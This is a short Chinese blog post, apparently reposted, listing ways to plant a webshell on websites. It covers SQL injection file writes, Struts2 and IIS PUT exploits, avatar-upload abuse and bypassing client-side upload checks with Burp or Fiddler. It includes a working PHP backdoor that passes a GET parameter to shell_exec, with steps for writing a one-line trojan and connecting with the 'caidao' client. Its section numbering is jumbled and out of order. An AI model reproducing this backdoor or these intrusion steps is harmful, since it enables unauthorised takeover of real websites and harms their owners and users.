Webshell篇

常用方法简介:

管理权限拿Webshell:

一、0day拿webshell

参考工具:织梦漏洞利用小工具

六、通过注入漏洞拿Webshell

前提条件:具有足够权限,对写入木马的文件夹要有写入权限,知道网站绝对路径。

对于mssql注入漏洞,网站可以通过log备份、差异备份拿Webshell

对于mysql注入漏洞的网站可以通过into   file函数将一句话木马写入,拿Webshell。

可以利用phpmyadmin将木马导出,拿Webshell

参考工具:Getwebshell增强版、pangolin、

三、通过远程命令执行拿Webshell

zhu.php

<?php
$x=$_GET["z"];
echo  "<pre>";
echo shell_exec($x);
echo  "<pre>";
?>

然后再浏览器访问此php文件,跟一个z的参数是一句话木马,输出到cracer.php文件

跟着在浏览器访问一下这个php文件,再用菜刀连接就可以了

四、struts2拿Webshell

参考工具:鬼哥struts2、Struts2漏洞批量检测

五、通过用户上传头像拿Webshell

原理:用户注册后,有些网站可以上传头像图片、附件、文件等,可以利用此来上传Webshell

普通权限拿Webshell:

2、IIS写权限拿webshell

原理:通过找到有IIS写入权限的网站,put进去一个txt文件,目录必须有可写的权限,然后通过move方法进行重命名为xxx.php

参考工具:IIS  put scanner

3、本地JS验证突破拿Webshell

当网站设置了JS来限制用户上传的文件类型时,我们可以通过删除JS文件或者修改上传文件类型突破上传限制拿Webshell

参考工具:使用burpsuit或fiddler代理工具提交,本地文件先改为XXX.jpg,上传时拦截,再把文件名后缀更改为php即可

4、修改网站上传类型配置拿Webshell

有的网站设置了上传类型的限制,修改其上传类型即可

猜你喜欢

转载自www.cnblogs.com/steven9898/p/11396164.html